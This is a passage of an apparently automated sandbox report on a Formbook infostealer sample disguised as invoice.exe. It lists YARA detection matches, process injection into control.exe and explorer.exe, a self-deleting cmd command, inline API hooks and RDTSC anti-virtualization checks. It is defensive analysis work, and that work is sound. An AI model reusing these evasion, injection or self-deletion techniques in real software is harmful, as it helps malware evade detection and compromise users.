          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04479730 NtQueryVirtualMemory,6_2_04479730
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044797A0 NtUnmapViewOfSection,6_2_044797A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0447B040 NtSuspendThread,6_2_0447B040
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04479820 NtEnumerateKey,6_2_04479820
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044798F0 NtReadVirtualMemory,6_2_044798F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044798A0 NtWriteVirtualMemory,6_2_044798A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04479950 NtQueueApcThread,6_2_04479950
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044799D0 NtCreateProcessEx,6_2_044799D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04479A00 NtProtectVirtualMemory,6_2_04479A00
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04479A10 NtQuerySection,6_2_04479A10
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04479A20 NtResumeThread,6_2_04479A20
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04479A80 NtOpenDirectoryObject,6_2_04479A80
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04479B00 NtSetValueKey,6_2_04479B00
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0447A3B0 NtGetContextThread,6_2_0447A3B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0239A050 NtClose,6_2_0239A050
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0239A100 NtAllocateVirtualMemory,6_2_0239A100
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_02399F20 NtCreateFile,6_2_02399F20
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_02399FD0 NtReadFile,6_2_02399FD0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0239A0FA NtAllocateVirtualMemory,6_2_0239A0FA
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_02399F1A NtCreateFile,6_2_02399F1A
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_02399FCB NtReadFile,6_2_02399FCB
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0030E1CF0_2_0030E1CF
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_003230AC0_2_003230AC
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_003229040_2_00322904
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0032425D0_2_0032425D
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0030AAC80_2_0030AAC8
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0031A33E0_2_0031A33E
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00312B170_2_00312B17
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_003133640_2_00313364
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_003223920_2_00322392
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0030AD1B0_2_0030AD1B
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_003126230_2_00312623
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00321E200_2_00321E20
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00314E9B0_2_00314E9B
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00311F200_2_00311F20
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00312F2F0_2_00312F2F
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_003137990_2_00313799
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_003230AC1_2_003230AC
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_003229041_2_00322904
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_0030E1CF1_2_0030E1CF
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_0032425D1_2_0032425D
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_0030AAC81_2_0030AAC8
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_0031A33E1_2_0031A33E
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00312B171_2_00312B17
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_003133641_2_00313364
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_003223921_2_00322392
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_0030AD1B1_2_0030AD1B
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_003126231_2_00312623
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00321E201_2_00321E20
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00314E9B1_2_00314E9B
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00311F201_2_00311F20
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00312F2F1_2_00312F2F
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_003137991_2_00313799
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_0041E8371_2_0041E837
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_0041E19A1_2_0041E19A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_0041DB181_2_0041DB18
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_0041E38D1_2_0041E38D
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00402D871_2_00402D87
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_0041DE201_2_0041DE20
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00409E301_2_00409E30
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA28EC1_2_00FA28EC
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F020A01_2_00F020A0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA20A81_2_00FA20A8
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EEB0901_2_00EEB090
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FAE8241_2_00FAE824
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F910021_2_00F91002
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EF41201_2_00EF4120
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EDF9001_2_00EDF900
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA22AE1_2_00FA22AE
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F903DA1_2_00F903DA
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F9DBD21_2_00F9DBD2
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F0EBB01_2_00F0EBB0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA2B281_2_00FA2B28
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F9D4661_2_00F9D466
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE841F1_2_00EE841F
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EED5E01_2_00EED5E0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA25DD1_2_00FA25DD
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F025811_2_00F02581
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA1D551_2_00FA1D55
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED0D201_2_00ED0D20
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA2D071_2_00FA2D07
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA2EF71_2_00FA2EF7
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EF6E301_2_00EF6E30
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F9D6161_2_00F9D616
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA1FF11_2_00FA1FF1
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FADFCE1_2_00FADFCE
          Source: C:\Windows\explorer.exeCode function: 4_2_06C00A524_2_06C00A52
          Source: C:\Windows\explorer.exeCode function: 4_2_06BFF8824_2_06BFF882
          Source: C:\Windows\explorer.exeCode function: 4_2_06BF8CF24_2_06BF8CF2
          Source: C:\Windows\explorer.exeCode function: 4_2_06BF8CE94_2_06BF8CE9
          Source: C:\Windows\explorer.exeCode function: 4_2_06C03A0C4_2_06C03A0C
          Source: C:\Windows\explorer.exeCode function: 4_2_06BF70724_2_06BF7072
          Source: C:\Windows\explorer.exeCode function: 4_2_06BF70694_2_06BF7069
          Source: C:\Windows\explorer.exeCode function: 4_2_06BFBB224_2_06BFBB22
          Source: C:\Windows\explorer.exeCode function: 4_2_06BFBB1F4_2_06BFBB1F
          Source: C:\Windows\explorer.exeCode function: 4_2_06BFE1524_2_06BFE152
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044FD4666_2_044FD466
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0444841F6_2_0444841F
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04501D556_2_04501D55
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04502D076_2_04502D07
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04430D206_2_04430D20
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_045025DD6_2_045025DD
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0444D5E06_2_0444D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044625816_2_04462581
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044FD6166_2_044FD616
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04456E306_2_04456E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04502EF76_2_04502EF7
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0450DFCE6_2_0450DFCE
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04501FF16_2_04501FF1
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044F10026_2_044F1002
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0450E8246_2_0450E824
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_045028EC6_2_045028EC
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0444B0906_2_0444B090
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044620A06_2_044620A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_045020A86_2_045020A8
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0443F9006_2_0443F900
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044541206_2_04454120
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_045022AE6_2_045022AE
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04502B286_2_04502B28
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044F03DA6_2_044F03DA
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044FDBD26_2_044FDBD2
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0446EBB06_2_0446EBB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0239E38D6_2_0239E38D
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0239E8376_2_0239E837
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0239E19A6_2_0239E19A
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_02389E306_2_02389E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_02382FB06_2_02382FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_02382D906_2_02382D90
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_02382D876_2_02382D87
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0443B150 appears 45 times
          Source: C:\Users\user\Desktop\invoice.exeCode function: String function: 00310BAA appears 42 times
          Source: C:\Users\user\Desktop\invoice.exeCode function: String function: 00307570 appears 126 times
          Source: C:\Users\user\Desktop\invoice.exeCode function: String function: 00316090 appears 80 times
          Source: C:\Users\user\Desktop\invoice.exeCode function: String function: 00EDB150 appears 45 times
          Source: invoice.exe, 00000000.00000003.657254130.0000000002D3F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs invoice.exe
          Source: invoice.exe, 00000001.00000002.694907659.0000000000C1A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs invoice.exe
          Source: invoice.exe, 00000001.00000002.695325238.000000000115F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs invoice.exe
          Source: 00000001.00000002.694812494.0000000000B70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.694812494.0000000000B70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.923314997.0000000000150000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.923314997.0000000000150000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.694843913.0000000000BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.694843913.0000000000BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.662094900.00000000029D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.662094900.00000000029D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.invoice.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.invoice.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.invoice.exe.29d0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.invoice.exe.29d0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.invoice.exe.29d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.invoice.exe.29d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.invoice.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.invoice.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/0@4/3
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6756:120:WilError_01
          Source: invoice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\invoice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeFile read: C:\Users\user\Desktop\invoice.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\invoice.exe 'C:\Users\user\Desktop\invoice.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\invoice.exe C:\Users\user\Desktop\invoice.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\invoice.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\invoice.exeProcess created: C:\Users\user\Desktop\invoice.exe C:\Users\user\Desktop\invoice.exeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\invoice.exe'Jump to behavior
          Source: invoice.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000002.934975474.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: invoice.exe, 00000000.00000003.660665803.0000000002A90000.00000004.00000001.sdmp, invoice.exe, 00000001.00000002.695023549.0000000000EB0000.00000040.00000001.sdmp, control.exe, 00000006.00000002.924534412.000000000452F000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: invoice.exe, 00000001.00000002.694907659.0000000000C1A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: invoice.exe, control.exe
          Source: Binary string: control.pdbUGP source: invoice.exe, 00000001.00000002.694907659.0000000000C1A000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000002.934975474.0000000005A00000.00000002.00000001.sdmp
          Source: invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_003160D5 push ecx; ret 0_2_003160E8
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0032F311 push eax; ret 0_2_0032F341
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0032F390 push eax; ret 0_2_0032F341
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0030F55D push ecx; ret 0_2_0030F570
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_003160D5 push ecx; ret 1_2_003160E8
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_0030F55D push ecx; ret 1_2_0030F570
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00416855 push ebx; retf 1_2_00416858
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_0041D075 push eax; ret 1_2_0041D0C8
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_0041D0C2 push eax; ret 1_2_0041D0C8
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_0041D0CB push eax; ret 1_2_0041D132
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_0041D12C push eax; ret 1_2_0041D132
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00416B05 push edx; ret 1_2_00416B08
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_004163B0 push esi; iretd 1_2_0041640A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_0041E5D3 push es; ret 1_2_0041E5E8
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F2D0D1 push ecx; ret 1_2_00F2D0E4
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0448D0D1 push ecx; ret 6_2_0448D0E4
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_02396B05 push edx; ret 6_2_02396B08
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_023963B0 push esi; iretd 6_2_0239640A
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0239D075 push eax; ret 6_2_0239D0C8
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_02396855 push ebx; retf 6_2_02396858
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0239E0AA push esp; retf 0000h6_2_0239E0B5
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0239D0CB push eax; ret 6_2_0239D132
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0239D0C2 push eax; ret 6_2_0239D0C8
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0239D12C push eax; ret 6_2_0239D132
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0239E5D3 push es; ret 6_2_0239E5E8

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE9
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0030E1CF RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0030E1CF
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\invoice.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\invoice.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000023898E4 second address: 00000000023898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000002389B4E second address: 0000000002389B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00409A80 rdtsc 1_2_00409A80
          Source: C:\Windows\explorer.exe TID: 3484Thread sleep count: 40 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 3484Thread sleep time: -80000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\control.exe TID: 6540Thread sleep time: -44000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: explorer.exe, 00000004.00000000.675249381.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.678740166.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.935455932.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.678740166.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.673260391.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000000.678863688.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
